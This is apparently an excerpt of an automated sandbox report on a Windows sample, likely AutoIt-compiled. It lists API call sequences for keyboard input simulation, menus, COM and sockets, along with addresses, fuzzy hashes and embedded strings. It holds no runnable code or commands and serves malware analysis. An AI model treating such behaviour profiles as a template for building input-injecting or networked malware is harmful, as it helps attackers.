                                        • Opcode Fuzzy Hash: 29de0a561e2936079cb176f1468186fe531836fb807ee057e2fb618e96556b31
                                        • Instruction Fuzzy Hash: D5419365C1021875CB15EBF4C88A9CFB7BCAF46710F508462E914E3122FB34E796E3A9
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C4682C,00000004,00000000,00000000), ref: 00C0F953
                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C4682C,00000004,00000000,00000000), ref: 00C4F3D1
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C4682C,00000004,00000000,00000000), ref: 00C4F454
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 7fbeb08b9d1dca0198c6c4ae9a36870aa38de60fd3f4f722344aa5e92e0c893c
                                        • Instruction ID: 512d00bb30092f30a6bbeac8875e5f5a81a0d83eb83bdf3250ce9c5aafb87767
                                        • Opcode Fuzzy Hash: 7fbeb08b9d1dca0198c6c4ae9a36870aa38de60fd3f4f722344aa5e92e0c893c
                                        • Instruction Fuzzy Hash: EE414B31608680BAC7388F2AD8C8B2E7B95BB86314F14443DE09752DF1CA31AAC3DB11
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00C82D1B
                                        • GetDC.USER32(00000000), ref: 00C82D23
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C82D2E
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C82D3A
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C82D76
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C82D87
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C85A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00C82DC2
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C82DE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 986bf417e797c7397ed5af33c4470a39db040a3b7b8305e163a9183198117511
                                        • Instruction ID: 6d7ff37bde81774fb1e3c6d8b32e84d6ef5ab1e1b12b29bae4ce9b432550a372
                                        • Opcode Fuzzy Hash: 986bf417e797c7397ed5af33c4470a39db040a3b7b8305e163a9183198117511
                                        • Instruction Fuzzy Hash: 44317A76201214BFEB219F50DC8AFEB3FA9EF09755F044066FE089A291D6759C50CBB8
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 898092facbc852fc66fee1efbfc070c5d1f1b55884790ee124b306a3bc54ae45
                                        • Instruction ID: ef18fffc3c52e91dff11e90bc7fd598a3ceab6a1df5e7496faced3730e6e2b9c
                                        • Opcode Fuzzy Hash: 898092facbc852fc66fee1efbfc070c5d1f1b55884790ee124b306a3bc54ae45
                                        • Instruction Fuzzy Hash: 3F213E6574090DB7D21465128DA2FFB335CAF21386F940034FE145A781FF24EF9992AD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: b0a882bbabe6b9bcd8e2d70b290c5dde550a2a317d401982bc75c9fffdb03245
                                        • Instruction ID: 54cb728dfe6c96f82b72d4e42268f4af88f8c0b6c2f05ca7d0618acf6e708b47
                                        • Opcode Fuzzy Hash: b0a882bbabe6b9bcd8e2d70b290c5dde550a2a317d401982bc75c9fffdb03245
                                        • Instruction Fuzzy Hash: 4BD1B475A0060A9FDF10CFA8C881BAEB7B5FF48344F14C069E929AB291D7B1DE45CB50
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C315CE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31651
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C317FB,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C316E4
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C316FB
                                          • Part of subcall function 00C23820: RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31777
                                        • __freea.LIBCMT ref: 00C317A2
                                        • __freea.LIBCMT ref: 00C317AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 2829977744-0
                                        • Opcode ID: 9b303c9d607bd671311163739290bf4932324109a55d6bdaf77fbcd75f5c9f1a
                                        • Instruction ID: e4ad709fb0111c517c2c8c0805e4986b5c9d08cb22235aa028b711cf71839b1d
                                        • Opcode Fuzzy Hash: 9b303c9d607bd671311163739290bf4932324109a55d6bdaf77fbcd75f5c9f1a
                                        • Instruction Fuzzy Hash: 3D918072E202169EDF219FA5C881AEE7BB5EF49710F1C4669EC11E7281DB35DE40CB60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2610073882-625585964
                                        • Opcode ID: a7271d65928044dc419e025bb1c2e9b63c32599b50b659db2dc8b12cd63eb88e
                                        • Instruction ID: 73f47110d5d4eb98516ebc5f68d4f7bf1404fb0e990eb9ae3016095e9472a893
                                        • Opcode Fuzzy Hash: a7271d65928044dc419e025bb1c2e9b63c32599b50b659db2dc8b12cd63eb88e
                                        • Instruction Fuzzy Hash: 4A918171A00219ABDF28CFA5C885FAEBBB8EF46714F10C559F519AB280D7709945CFA0
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C6125C
                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61284
                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C612A8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C612D8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C6135F
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C613C4
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C61430
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                        • String ID:
                                        • API String ID: 2550207440-0
                                        • Opcode ID: b8742e4c0a0a892e620bf7458b5bd917746ecbf8e80d7e5ac2bbf1114625f8c5
                                        • Instruction ID: 02e21f4ea731c80678ab2340fc5b543dff87d5dace065a8dc081a758eefa0282
                                        • Opcode Fuzzy Hash: b8742e4c0a0a892e620bf7458b5bd917746ecbf8e80d7e5ac2bbf1114625f8c5
                                        • Instruction Fuzzy Hash: 0691E071A00218AFDB20DFA4C8D5BBEB7F5FF45312F194029E911EB291DB74A981DB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: aad63fa12bf724f0efe4a6cbcfcd87bef0b3d5d7ee2ac34cbda9a35df6afed1a
                                        • Instruction ID: 33de031d0b979a5661fe3bc73b4bdf4c2d7fdceae95a212211d0abbf43ecc9a7
                                        • Opcode Fuzzy Hash: aad63fa12bf724f0efe4a6cbcfcd87bef0b3d5d7ee2ac34cbda9a35df6afed1a
                                        • Instruction Fuzzy Hash: F5913871D00219EFCB10CFAACC84AEEBBB8FF49320F148555E515B7292D374AA41DB60
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00C7396B
                                        • CharUpperBuffW.USER32(?,?), ref: 00C73A7A
                                        • _wcslen.LIBCMT ref: 00C73A8A
                                        • VariantClear.OLEAUT32(?), ref: 00C73C1F
                                          • Part of subcall function 00C60CDF: VariantInit.OLEAUT32(00000000), ref: 00C60D1F
                                          • Part of subcall function 00C60CDF: VariantCopy.OLEAUT32(?,?), ref: 00C60D28
                                          • Part of subcall function 00C60CDF: VariantClear.OLEAUT32(?), ref: 00C60D34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4137639002-1221869570
                                        • Opcode ID: 77db5114ecb02f588de16cb91456abf4d5db5039c3a2d75521dd694b57a7d79a
                                        • Instruction ID: adb8b81d50e4ca93a3c92018d7c0cd44e069f8fa9099509f90d1a23b16c4bbaa
                                        • Opcode Fuzzy Hash: 77db5114ecb02f588de16cb91456abf4d5db5039c3a2d75521dd694b57a7d79a
                                        • Instruction Fuzzy Hash: 0D91A9756083459FCB04EF24C48196AB7E4FF88314F14896EF89A9B351DB30EE49DB92
                                        APIs
                                          • Part of subcall function 00C5000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?,?,00C5035E), ref: 00C5002B
                                          • Part of subcall function 00C5000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50046
                                          • Part of subcall function 00C5000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50054
                                          • Part of subcall function 00C5000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?), ref: 00C50064
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C74C51
                                        • _wcslen.LIBCMT ref: 00C74D59
                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C74DCF
                                        • CoTaskMemFree.OLE32(?), ref: 00C74DDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 614568839-2785691316
                                        • Opcode ID: cde214d7745ca539f59e36eb48d0787fb24169cc4a0c5e0a71d464b45cafe9a0
                                        • Instruction ID: de00dbfc6e8429762fe16d3da29fa51a0ed7664c7e30f2c7e06f3d417b4f0dd6
                                        • Opcode Fuzzy Hash: cde214d7745ca539f59e36eb48d0787fb24169cc4a0c5e0a71d464b45cafe9a0
                                        • Instruction Fuzzy Hash: CF910871D0021DAFDF14DFA4C891AEEB7B9BF08350F108169E929A7291DB709A49CF60
                                        APIs
                                        • GetMenu.USER32(?), ref: 00C82183
                                        • GetMenuItemCount.USER32(00000000), ref: 00C821B5
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C821DD
                                        • _wcslen.LIBCMT ref: 00C82213
                                        • GetMenuItemID.USER32(?,?), ref: 00C8224D
                                        • GetSubMenu.USER32(?,?), ref: 00C8225B
                                          • Part of subcall function 00C53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53A57
                                          • Part of subcall function 00C53A3D: GetCurrentThreadId.KERNEL32 ref: 00C53A5E
                                          • Part of subcall function 00C53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C525B3), ref: 00C53A65
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C822E3
                                          • Part of subcall function 00C5E97B: Sleep.KERNEL32 ref: 00C5E9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 4196846111-0
                                        • Opcode ID: 9234494aaae292bf86f3df33976b7b56236154dd3dbfdbc760aea7578a51a44f
                                        • Instruction ID: 8f810a80c86e59a21c53407a0ad37da92524480e5730dd5f018addd08a9b17b8
                                        • Opcode Fuzzy Hash: 9234494aaae292bf86f3df33976b7b56236154dd3dbfdbc760aea7578a51a44f
                                        • Instruction Fuzzy Hash: F671B335A00205AFCB10EF64C889AAEB7F5EF48324F108499E926EB351D734EE41DB94
                                        APIs
                                        • GetParent.USER32(?), ref: 00C5AEF9
                                        • GetKeyboardState.USER32(?), ref: 00C5AF0E
                                        • SetKeyboardState.USER32(?), ref: 00C5AF6F
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C5AF9D
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C5AFBC
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C5AFFD
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C5B020
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: c2896d92cf224cdde281b84a7adc43805a962dd7daf2a4f45746d2e9374be4b4
                                        • Instruction ID: 050338b66a30f8266fe7f5c5109fe5c0cc8df0fd4ce6347b0b3d498bbc8c334c
                                        • Opcode Fuzzy Hash: c2896d92cf224cdde281b84a7adc43805a962dd7daf2a4f45746d2e9374be4b4
                                        • Instruction Fuzzy Hash: 3A5124E46047D13DFB3242348C45BBABEA95B06305F088689F9E8454C2C3E8AECCD369
                                        APIs
                                        • GetParent.USER32(00000000), ref: 00C5AD19
                                        • GetKeyboardState.USER32(?), ref: 00C5AD2E
                                        • SetKeyboardState.USER32(?), ref: 00C5AD8F
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C5ADBB
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C5ADD8
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C5AE17
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C5AE38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 7ff04b0ceeb27095fde6ab6acf8db965f4b506fa2e86eea3d3ae558fe2559e9e
                                        • Instruction ID: 93647e9558a7e75ea68df42848795edb4f9f3d7b3523a3291ce51cd5299d6367
                                        • Opcode Fuzzy Hash: 7ff04b0ceeb27095fde6ab6acf8db965f4b506fa2e86eea3d3ae558fe2559e9e
                                        • Instruction Fuzzy Hash: 35514AA55047D53DFB3343368C46B7ABEA86B06302F088688E4E5568C2D3D4EDDCD36A
                                        APIs
                                        • GetConsoleCP.KERNEL32(00C33CD6,?,?,?,?,?,?,?,?,00C25BA3,?,?,00C33CD6,?,?), ref: 00C25470
                                        • __fassign.LIBCMT ref: 00C254EB
                                        • __fassign.LIBCMT ref: 00C25506
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00C33CD6,00000005,00000000,00000000), ref: 00C2552C
                                        • WriteFile.KERNEL32(?,00C33CD6,00000000,00C25BA3,00000000,?,?,?,?,?,?,?,?,?,00C25BA3,?), ref: 00C2554B
                                        • WriteFile.KERNEL32(?,?,00000001,00C25BA3,00000000,?,?,?,?,?,?,?,?,?,00C25BA3,?), ref: 00C25584
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 0f324db3544c5d1b084e9c07053d345aba53991f9779500ea87bce9e13b9c9a4
                                        • Instruction ID: 9a4d9c2e762e6928152430dcf1b08d4ddb307982d1eba3bd06a28f96587ce03e
                                        • Opcode Fuzzy Hash: 0f324db3544c5d1b084e9c07053d345aba53991f9779500ea87bce9e13b9c9a4
                                        • Instruction Fuzzy Hash: 7151B3B1A007599FDB10CFA8E885BEEBBF9EF09301F14452AF555E7291D7309A41CB60
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00C12D4B
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00C12D53
                                        • _ValidateLocalCookies.LIBCMT ref: 00C12DE1
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00C12E0C
                                        • _ValidateLocalCookies.LIBCMT ref: 00C12E61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 6f47bc651087d1a37ebad3410d61cbb6e2e50b18ec8ab84c05aebbb9d5a14348
                                        • Instruction ID: 0377b3e1cbbb42c0ba4508a1af24340846566489d4d369b51240a0ba1faf8bb3
                                        • Opcode Fuzzy Hash: 6f47bc651087d1a37ebad3410d61cbb6e2e50b18ec8ab84c05aebbb9d5a14348
                                        • Instruction Fuzzy Hash: 8F41D738E002099FCF10EF68D845ADEBBB5BF46324F148155E8156B392D731EAA5EBD0
                                        APIs
                                          • Part of subcall function 00C7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C7307A
                                          • Part of subcall function 00C7304E: _wcslen.LIBCMT ref: 00C7309B
                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C71112
                                        • WSAGetLastError.WSOCK32 ref: 00C71121
                                        • WSAGetLastError.WSOCK32 ref: 00C711C9
                                        • closesocket.WSOCK32(00000000), ref: 00C711F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
